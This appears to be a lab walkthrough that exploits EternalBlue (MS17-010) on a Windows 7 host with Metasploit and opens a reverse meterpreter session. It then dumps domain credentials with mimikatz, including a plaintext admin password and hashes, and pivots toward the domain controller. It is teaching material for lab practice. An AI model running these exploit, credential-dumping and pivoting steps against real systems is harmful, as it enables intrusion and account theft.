Lab information:

[image: file-20260327161710977]

[image: file-20260327133303428]

Notes about the lab:

[image: file-20260327133400559]

[image: file-20260327133417571]

I. Port scanning

Tool: rustscan. Command:

rustscan -a 192.168.111.20 --top

--top only covers the 1000 most common ports; if something looks missing later, rerun with -r 1-65535.

Result:

PORT     STATE  SERVICE       REASON
80/tcp   open   http          syn-ack ttl 127
135/tcp  open   msrpc         syn-ack ttl 127
139/tcp  open   netbios-ssn   syn-ack ttl 127
445/tcp  open   microsoft-ds  syn-ack ttl 127

II. EternalBlue

445 is open, so the reflex is to check for EternalBlue (MS17-010).

Find the matching detection script in nmap's script directory:

┌──(penv)─(zyf㉿kali)-[/usr/share/nmap/scripts]
└─$ ls | grep ms17-010
smb-vuln-ms17-010.nse

Verify with nmap:

nmap --script smb-vuln-ms17-010 192.168.111.20 -p 445

Output:

Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-26 21:38 CST
Nmap scan report for 192.168.111.20
Host is up (0.25s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 4.90 seconds

MS17-010 confirmed. The check is non-destructive: the script logs in with a null session, connects to IPC$ and sends an SMB_COM_TRANSACTION (PeekNamedPipe) on FID 0. An unpatched SMBv1 server answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); a patched one answers STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE. nmap lists CVE-2017-0143, but the MS17-010 bulletin covers CVE-2017-0143 through CVE-2017-0148.
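To make the signal behind that VULNERABLE verdict concrete, here is an added Python example (not part of the original write-up and not nmap's or Metasploit's code) that parses the 32-byte SMBv1 header of a PeekNamedPipe reply and classifies the host from its NT status, exactly the distinction both checkers make. The reply bytes are constructed inline for offline use, not captured from the lab:

```python
import struct

# NT status values the MS17-010 probe (SMB_COM_TRANSACTION / PeekNamedPipe on FID 0) produces.
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched SMBv1: the vulnerable signature
STATUS_ACCESS_DENIED = 0xC0000022            # patched
STATUS_INVALID_HANDLE = 0xC0000008           # patched

SMB_COM_TRANSACTION = 0x25
# \xffSMB, command, NT status, flags, flags2, PIDHigh, signature, reserved, TID, PID, UID, MID
SMB_HEADER = struct.Struct("<4sBIBHH8sHHHHH")  # 32 bytes, little-endian


def parse_smb1_header(data: bytes) -> dict:
    """Split a raw SMBv1 message (4-byte NetBIOS session header included) into header fields."""
    if len(data) < 4 + SMB_HEADER.size:
        raise ValueError("too short for NetBIOS + SMB header")
    nb_type, nb_len = data[0], int.from_bytes(data[1:4], "big")
    if nb_type != 0x00:
        raise ValueError(f"unexpected NetBIOS message type {nb_type:#x}")
    (proto, command, status, flags, flags2, _pid_high, _sig,
     _reserved, tid, pid, uid, mid) = SMB_HEADER.unpack_from(data, 4)
    if proto != b"\xffSMB":
        raise ValueError("not an SMBv1 message")
    return {"nb_len": nb_len, "command": command, "status": status, "flags": flags,
            "flags2": flags2, "tid": tid, "pid": pid, "uid": uid, "mid": mid}


def classify_ms17_010(reply: bytes) -> str:
    """VULNERABLE / PATCHED / UNKNOWN from the status of the PeekNamedPipe reply."""
    hdr = parse_smb1_header(reply)
    if hdr["command"] != SMB_COM_TRANSACTION:
        return "UNKNOWN"
    if hdr["status"] == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if hdr["status"] in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "PATCHED"
    return "UNKNOWN"


def build_reply(status: int, command: int = SMB_COM_TRANSACTION) -> bytes:
    """Constructed sample reply (header only, no parameter/data blocks) for testing offline."""
    hdr = SMB_HEADER.pack(b"\xffSMB", command, status,
                          0x98,        # flags: this is a reply, case-insensitive paths
                          0xC807,      # flags2: unicode, NT status codes, long names
                          0, b"\x00" * 8, 0,
                          0x0800, 0xFEFF, 0x0800, 0x40)   # TID, PID, UID, MID
    return b"\x00" + len(hdr).to_bytes(3, "big") + hdr


if __name__ == "__main__":
    for name, st in (("unpatched", STATUS_INSUFF_SERVER_RESOURCES),
                     ("patched", STATUS_ACCESS_DENIED)):
        print(name, "->", classify_ms17_010(build_reply(st)))
```

Anything other than those three statuses is reported as UNKNOWN rather than guessed; a real probe also has to survive the negotiate / session setup / tree connect steps first, which this parser deliberately leaves out.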

III. MSF

Start Metasploit:

msfconsole

Search for the matching module:

msf6 > search ms17-010

Output:

   #   Name                                          Disclosure Date  Rank     Check  Description
   -   ----                                          ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue      2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                 .                .        .      .
   2     \_ target: Windows 7                        .                .        .      .
   3     \_ target: Windows Embedded Standard 7      .                .        .      .
   4     \_ target: Windows Server 2008 R2           .                .        .      .
   5     \_ target: Windows 8                        .                .        .      .
   6     \_ target: Windows 8.1                      .                .        .      .
   7     \_ target: Windows Server 2012              .                .        .      .
   8     \_ target: Windows 10 Pro                   .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                        .                .        .      .
   12    \_ target: PowerShell                       .                .        .      .
   13    \_ target: Native upload                    .                .        .      .
   14    \_ target: MOF upload                       .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                      .                .        .      .
   16    \_ AKA: ETERNALROMANCE                      .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                     .                .        .      .
   18    \_ AKA: ETERNALBLUE                         .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command          2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                      .                .        .      .
   21    \_ AKA: ETERNALROMANCE                      .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                     .                .        .      .
   23    \_ AKA: ETERNALBLUE                         .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010            .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                        .                .        .      .
   26    \_ AKA: ETERNALBLUE                         .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce      2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)            .                .        .      .
   29    \_ target: Neutralize implant               .                .        .      .

Use entry 0 (the index refers to the last search result):

use 0

See what has to be set:

options

Output:

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.85.142   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Fill in everything marked Required (LHOST already has a default, 192.168.85.142, picked from another local interface; override it with the address the target should connect back to):

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.111.20
RHOSTS => 192.168.111.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.111.25
LHOST => 192.168.111.25

Run the exploit:

run

It succeeds:

msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[-] Handler failed to bind to 192.168.111.25:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 192.168.111.20:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.111.20:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.111.20:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.111.20:445 - The target is vulnerable.
[*] 192.168.111.20:445 - Connecting to target for exploitation.
[+] 192.168.111.20:445 - Connection established for exploitation.
[+] 192.168.111.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.111.20:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.111.20:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.111.20:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.111.20:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.111.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.111.20:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.111.20:445 - Sending all but last fragment of exploit packet
[*] 192.168.111.20:445 - Starting non-paged pool grooming
[+] 192.168.111.20:445 - Sending SMBv2 buffers
[+] 192.168.111.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.111.20:445 - Sending final SMBv2 buffers.
[*] 192.168.111.20:445 - Sending last fragment of exploit packet!
[*] 192.168.111.20:445 - Receiving response from exploit packet
[+] 192.168.111.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.111.20:445 - Sending egg to corrupted connection.
[*] 192.168.111.20:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 192.168.111.20
[*] Meterpreter session 1 opened (10.8.0.6:4444 -> 192.168.111.20:1581) at 2026-03-26 21:47:33 +0800
[+] 192.168.111.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.111.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.111.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

About the [-] Handler failed to bind to 192.168.111.25:4444 line: 192.168.111.25 is not an address on a local interface of the attack box (the session line shows the connection arriving on 10.8.0.6, the VPN side), so MSF could not bind it and fell back to 0.0.0.0:4444. The session still came in, which means the target's connection to 192.168.111.25:4444 was delivered to the VPN client. If that fallback ever fails, keep LHOST as the address the target can reach and set the advanced option ReverseListenerBindAddress to an address that is actually local.

IV. Internal reconnaissance

1. Domain controller information

From the meterpreter shell you can run the post-exploitation gathering modules (post modules) directly:

meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: god.org
[+] Domain NetBIOS Name: GOD
[+] Domain Controller: owa.god.org (IP: 192.168.52.138)

This tells us:

  • Domain controller: owa.god.org (IP: 192.168.52.138)
  • Domain: god.org

Why this module:

Honestly, the fastest way right now is to ask an AI:

[image: file-20260327093900920]

Instant answer. If you insist on finding it yourself there are two options:

  1. Google
  2. MSF's built-in search, then read the module Description

Google first. Search terms:

metasploit enumerate domain controller module

[image: file-20260327094033265]

[image: file-20260327094051382]

But it is nowhere near as convenient, fast or accurate as the AI, and with the AI you can keep asking follow-ups (...)

Now the search command. First you need the naming scheme for post modules:

post / <platform> / <category> / <name>

Our target:

  • platform: windows
  • category: gather, i.e. information gathering
  • name: enum_domain, a compound of "enumerate (enum) + domain"

search gives fuzzy results (background the session with bg first; otherwise you get meterpreter's own search command, which searches files on the target, not modules):

msf6 exploit(windows/smb/ms17_010_eternalblue) > search enum domain gather type:post platform:windows

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank    Check  Description
   -   ----                                                 ---------------  ----    -----  -----------
   0   post/multi/gather/dns_srv_lookup                     .                normal  No     Multi Gather DNS Service Record Lookup Scan
   1   post/windows/gather/enum_ad_to_wordlist              .                normal  No     Windows Active Directory Wordlist Builder
   2   post/windows/gather/enum_ad_bitlocker                .                normal  No     Windows Gather Active Directory BitLocker Recovery
   3   post/windows/gather/enum_ad_computers                .                normal  No     Windows Gather Active Directory Computers
   4   post/windows/gather/enum_ad_groups                   .                normal  No     Windows Gather Active Directory Groups
   5   post/windows/gather/enum_ad_managedby_groups         .                normal  No     Windows Gather Active Directory Managed Groups
   6   post/windows/gather/enum_ad_service_principal_names  .                normal  No     Windows Gather Active Directory Service Principal Names
   7   post/windows/gather/enum_ad_user_comments            .                normal  No     Windows Gather Active Directory User Comments
   8   post/windows/gather/enum_ad_users                    .                normal  No     Windows Gather Active Directory Users
   9   post/windows/gather/credentials/enum_cred_store      .                normal  No     Windows Gather Credential Store Enumeration and Decryption Module
   10  post/windows/gather/enum_domains                     .                normal  No     Windows Gather Domain Enumeration
   11  post/windows/gather/enum_domain_users                .                normal  No     Windows Gather Enumerate Active Domain Users
   12  post/windows/gather/enum_computers                   .                normal  No     Windows Gather Enumerate Computers
   13  post/windows/gather/enum_domain                      .                normal  No     Windows Gather Enumerate Domain
   14  post/windows/gather/enum_tokens                      .                normal  No     Windows Gather Enumerate Domain Admin Tokens (Token Hunter)
   15  post/windows/gather/enum_domain_group_users          .                normal  No     Windows Gather Enumerate Domain Group
   16  post/windows/gather/enum_domain_tokens               .                normal  No     Windows Gather Enumerate Domain Tokens
   17  post/windows/gather/credentials/gpp                  .                normal  No     Windows Gather Group Policy Preference Saved Passwords
   18  post/windows/gather/credentials/imail                .                normal  No     Windows Gather IPSwitch iMail User Data Enumeration
   19  post/windows/gather/local_admin_search_enum          .                normal  No     Windows Gather Local Admin Search

The Description column narrows it to two candidates:

   10  post/windows/gather/enum_domains   .  normal  No  Windows Gather Domain Enumeration
   13  post/windows/gather/enum_domain    .  normal  No  Windows Gather Enumerate Domain

Check with info:

msf6 exploit(windows/smb/ms17_010_eternalblue) > info post/windows/gather/enum_domain

       Name: Windows Gather Enumerate Domain
     Module: post/windows/gather/enum_domain
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  Joshua Abraham <jabra@rapid7.com>

Module stability:
  crash-safe

Compatible session types:
  Meterpreter
  Powershell
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on

Description:
  This module identifies the primary Active Directory domain name
  and domain controller.


View the full module info with the info -d command.

Hmm, I still find the AI handier, but when offline, search works as a fallback.

2. Network interface information

meterpreter > ipconfig

(This is meterpreter's built-in ipconfig, not cmd.exe's; the Windows /all switch is not needed, and the listing below is meterpreter's own format.)

Interface  1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:50:56:b1:31:9d
MTU : 1500
IPv4 Address : 192.168.52.143
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::ec33:dadb:2e55:9492
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:348f
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 15
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280


Interface 16
============
Name : Microsoft ISATAP Adapter #3
Hardware MAC : 00:00:00:00:00:00
MTU : 1280


Interface 17
============
Name : Microsoft ISATAP Adapter #4
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a9fe:81ba
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 18
============
Name : Microsoft ISATAP Adapter #5
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:6f14
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 22
============
Name : TAP-Windows Adapter V9
Hardware MAC : 00:ff:44:8d:cb:b5
MTU : 1500
IPv4 Address : 169.254.135.129
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::480f:c25c:1f43:8781
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 23
============
Name : TAP-Windows Adapter V9 #2
Hardware MAC : 00:ff:56:0b:ea:fc
MTU : 1500
IPv4 Address : 169.254.99.189
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::4d82:616f:441c:63bd
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 24
============
Name : Npcap Loopback Adapter
Hardware MAC : 02:00:4c:4f:4f:50
MTU : 1500
IPv4 Address : 169.254.129.186
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::b461:ccad:e30f:81ba
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 26
============
Name : Intel(R) PRO/1000 MT Network Connection #3
Hardware MAC : 00:50:56:b1:d7:01
MTU : 1500
IPv4 Address : 192.168.111.20
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::ecdc:7ab8:c0fb:cfc5
IPv6 Netmask : ffff:ffff:ffff:ffff::

Ignoring the virtual and irrelevant adapters, the two that matter are:

Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:50:56:b1:31:9d
MTU : 1500
IPv4 Address : 192.168.52.143
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::ec33:dadb:2e55:9492
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 26
============
Name : Intel(R) PRO/1000 MT Network Connection #3
Hardware MAC : 00:50:56:b1:d7:01
MTU : 1500
IPv4 Address : 192.168.111.20
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::ecdc:7ab8:c0fb:cfc5
IPv6 Netmask : ffff:ffff:ffff:ffff::

The host is dual-homed: an external interface (192.168.111.20) and an internal one (192.168.52.143). The DC, 192.168.52.138, sits on that internal subnet, so this machine is the pivot to the domain controller. (The ISATAP adapters leak the same two addresses: fe80::5efe:c0a8:348f and fe80::5efe:c0a8:6f14 embed 192.168.52.143 and 192.168.111.20 in their last 32 bits.)
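Instead of eyeballing a long listing, the following added Python (not part of the original write-up) parses meterpreter's ipconfig output, drops loopback and 169.254/16 adapters, lists the real IPv4 networks, decodes ISATAP link-local addresses (fe80::5efe:<ipv4 in hex>) to the IPv4 they embed, and picks the pivot address on the same subnet as a given target, which is what LHOST must be for a reverse payload launched at the DC later on. The sample text is constructed from the listing above, abridged to the informative adapters:

```python
import ipaddress
import re

# Constructed sample: the meterpreter ipconfig listing above, abridged.
IPCONFIG_OUTPUT = """\
Interface  1
Name         : Software Loopback Interface 1
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 11
Name         : Intel(R) PRO/1000 MT Network Connection
IPv4 Address : 192.168.52.143
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::ec33:dadb:2e55:9492

Interface 12
Name         : Microsoft ISATAP Adapter
IPv6 Address : fe80::5efe:c0a8:348f

Interface 17
Name         : Microsoft ISATAP Adapter #4
IPv6 Address : fe80::5efe:a9fe:81ba

Interface 18
Name         : Microsoft ISATAP Adapter #5
IPv6 Address : fe80::5efe:c0a8:6f14

Interface 22
Name         : TAP-Windows Adapter V9
IPv4 Address : 169.254.135.129
IPv4 Netmask : 255.255.0.0

Interface 26
Name         : Intel(R) PRO/1000 MT Network Connection #3
IPv4 Address : 192.168.111.20
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::ecdc:7ab8:c0fb:cfc5
"""

ISATAP_IIDS = (b"\x00\x00\x5e\xfe", b"\x02\x00\x5e\xfe")  # private / public ISATAP interface IDs


def parse_ipconfig(text):
    """Split meterpreter ipconfig output into per-interface dicts."""
    interfaces = []
    for block in re.split(r"\n(?=Interface\s+\d+\n)", text.strip()):
        lines = block.splitlines()
        m = re.match(r"Interface\s+(\d+)", lines[0])
        if not m:
            continue
        iface = {"idx": int(m.group(1)), "name": "", "ipv4": None, "netmask": None, "ipv6": []}
        for line in lines[1:]:
            key, sep, value = line.partition(":")  # first colon only: IPv6/MAC values contain colons
            if not sep:
                continue
            key, value = key.strip(), value.strip()
            if key == "Name":
                iface["name"] = value
            elif key == "IPv4 Address":
                iface["ipv4"] = value
            elif key == "IPv4 Netmask":
                iface["netmask"] = value
            elif key == "IPv6 Address":
                iface["ipv6"].append(value)
        interfaces.append(iface)
    return interfaces


def isatap_embedded_ipv4(addr):
    """fe80::[0|200]:5efe:w.x.y.z -> 'w.x.y.z', or None if addr is not an ISATAP link-local."""
    packed = ipaddress.IPv6Address(addr).packed
    if packed[:8] != b"\xfe\x80" + b"\x00" * 6 or packed[8:12] not in ISATAP_IIDS:
        return None
    return str(ipaddress.IPv4Address(packed[12:]))


def real_ipv4_networks(interfaces):
    """(name, network) for adapters with a usable IPv4: loopback and 169.254/16 (APIPA) dropped."""
    out = []
    for iface in interfaces:
        if not iface["ipv4"]:
            continue
        ip = ipaddress.ip_interface(f"{iface['ipv4']}/{iface['netmask']}")
        if ip.ip.is_loopback or ip.ip.is_link_local:
            continue
        out.append((iface["name"], str(ip.network)))
    return out


def isatap_leaked_ipv4(interfaces):
    """IPv4 addresses recoverable from ISATAP addresses alone, same filter as above."""
    found = set()
    for iface in interfaces:
        for a in iface["ipv6"]:
            v4 = isatap_embedded_ipv4(a)
            if v4 and not ipaddress.IPv4Address(v4).is_link_local:
                found.add(v4)
    return sorted(found, key=ipaddress.IPv4Address)


def lhost_for(interfaces, target):
    """Pivot address on the same subnet as target: the only LHOST a reverse payload there can reach."""
    t = ipaddress.ip_address(target)
    for iface in interfaces:
        if iface["ipv4"] and iface["netmask"]:
            if t in ipaddress.ip_interface(f"{iface['ipv4']}/{iface['netmask']}").network:
                return iface["ipv4"]
    return None


if __name__ == "__main__":
    ifaces = parse_ipconfig(IPCONFIG_OUTPUT)
    print("networks:", real_ipv4_networks(ifaces))
    print("from ISATAP:", isatap_leaked_ipv4(ifaces))
    print("LHOST for 192.168.52.138:", lhost_for(ifaces, "192.168.52.138"))
```

The ISATAP decode is worth keeping in the toolbox: on a host where the second NIC has been hidden from you, those tunnel adapters still name every IPv4 address the box has.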

V. Lateral movement

1. Credential harvesting

The current user is SYSTEM:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Dump credentials:

# load the kiwi extension (built-in mimikatz)
meterpreter > load kiwi

# dump every credential (plaintext + hashes)
meterpreter > creds_all

Output:

meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain  LM                                NTLM                              SHA1
--------       ------  --                                ----                              ----
Administrator  GOD     d29aa94631a1dca1aad3b435b51404ee  933a9b5b44dab4530d86d83a6b47b7d1  c3e55f8634feec6635faef5eba3b04a9b08e5ed9
STU1$          GOD                                       c8175d606297e4f2feebbbda926cd9f7  b328ba45ca1570739b04ba3cb235a5ce245dd30f

wdigest credentials
===================

Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator GOD qwe@123
STU1$ GOD 23 92 0a b9 c4 88 e1 9f cd be cf fb 83 cf 00 cc 56 13 7e 22 f0 79 50 60 32 c5 97 97 02 7e 29 fc 0a 5f 50 b0 6e bf 17 40 8c 50 a7 75 c1 68 f1 ec 4c 3c b3 ca d4 87 d7 48 54 b3 02 56 a0 6e 68 17 86 42 34 40 35 41 79 d6 41 11 4c e5 57 dc 2c 93 08 d3 51 3a 40 c4 26 7c 69 2d bb c0 f4 28 1e 37 9d c2 40 2f aa 22 e9 ff 9a 21 f6 9f 56 a6 35 3d ae a1 10 38 a7 33 70 3c b1 6e 2c 60 3d 20 fc 5b 67 e2 21 4c 8b 67 18 da be d0 10 c2 27 0c d2 fa 05 28 eb 4b b9 fa 58 18 fa 97 f9 d6 9f ae f6 7e 4a 6c 2d 9d f3 6e a5 c1 d3 66 73 22 39 df c5 57 ed 10 02 24 74 77 9e 9f ea 56 8f 95 46 f9 0a 05 17 51 62 8d 40 15 1d b6 f7 b6 43 d6 3e 38 2d 4f 46 f9 ef 5f d2 c2 dc 39 d7 f7 06 25 87 3e 43 bc e1 cd 5e 2b 26 38 c7 af 28 e6 2f 41 e9 a7 f3 7a

tspkg credentials
=================

Username Domain Password
-------- ------ --------
Administrator GOD qwe@123

kerberos credentials
====================

Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator GOD.ORG qwe@123
stu1$ GOD.ORG 23 92 0a b9 c4 88 e1 9f cd be cf fb 83 cf 00 cc 56 13 7e 22 f0 79 50 60 32 c5 97 97 02 7e 29 fc 0a 5f 50 b0 6e bf 17 40 8c 50 a7 75 c1 68 f1 ec 4c 3c b3 ca d4 87 d7 48 54 b3 02 56 a0 6e 68 17 86 42 34 40 35 41 79 d6 41 11 4c e5 57 dc 2c 93 08 d3 51 3a 40 c4 26 7c 69 2d bb c0 f4 28 1e 37 9d c2 40 2f aa 22 e9 ff 9a 21 f6 9f 56 a6 35 3d ae a1 10 38 a7 33 70 3c b1 6e 2c 60 3d 20 fc 5b 67 e2 21 4c 8b 67 18 da be d0 10 c2 27 0c d2 fa 05 28 eb 4b b9 fa 58 18 fa 97 f9 d6 9f ae f6 7e 4a 6c 2d 9d f3 6e a5 c1 d3 66 73 22 39 df c5 57 ed 10 02 24 74 77 9e 9f ea 56 8f 95 46 f9 0a 05 17 51 62 8d 40 15 1d b6 f7 b6 43 d6 3e 38 2d 4f 46 f9 ef 5f d2 c2 dc 39 d7 f7 06 25 87 3e 43 bc e1 cd 5e 2b 26 38 c7 af 28 e6 2f 41 e9 a7 f3 7a

Enumerate the Domain Admins group:

meterpreter > run post/windows/gather/enum_domain_group_users GROUP="Domain Admins"
[*] Running module against STU1 (192.168.111.20)
[*] Found 2 users in 'god.org\Domain Admins' group.
[*] GOD\Administrator
[*] GOD\OWA$
[*] Current session running as god.org\SYSTEM is not a member of god.org\Domain Admins

From the above:

  • Domain admin account:
    • username: Administrator
    • password: qwe@123

Two caveats. The plaintext comes from the WDigest provider, which Windows 7 / Server 2008 R2 keep enabled by default; on Windows 8.1 / 2012 R2 and later it is off unless UseLogonCredential has been set, so on a newer host you would only get the NT hash. And the LM hash d29aa94631a1dca1aad3b435b51404ee ends in aad3b435b51404ee, the value of an empty 7-character half, which on its own tells you the password is at most 7 characters, consistent with qwe@123. The long hex blob for STU1$ is the machine account's random password; it is not typeable, but its NT hash works for authentication just the same.

2. Routing

Note: don't confuse "route" here with routing on a router. autoroute adds an entry to Metasploit's own routing table: traffic that framework modules (scanners, psexec, payload handlers) generate for 192.168.52.0/24 is sent through this meterpreter session, so the session acts as the gateway. It is not a system-wide proxy; tools outside msfconsole only benefit if you additionally start auxiliary/server/socks_proxy and point them at it.

meterpreter > run autoroute -s 192.168.52.0/24

(run autoroute is the old meterpreter script and prints a deprecation warning; run post/multi/manage/autoroute is the current form, with SUBNET and NETMASK options. route print in msfconsole shows the resulting table and which session each route goes through.)

From now on, MSF traffic for 192.168.52.0/24 goes through the session on the pivot.

3. Lateral movement

First check which ports the DC exposes. Find a scanner module:

msf6 auxiliary(scanner/portscan/syn) > search portscan type:auxiliary

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce             .                normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan         .                normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner     .                normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                  .                normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                   .                normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                   .                normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                   .                normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access .                normal  No     Wordpress Pingback Locator


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access

Pick the TCP connect scanner:

msf6 auxiliary(scanner/portscan/syn) > use 5

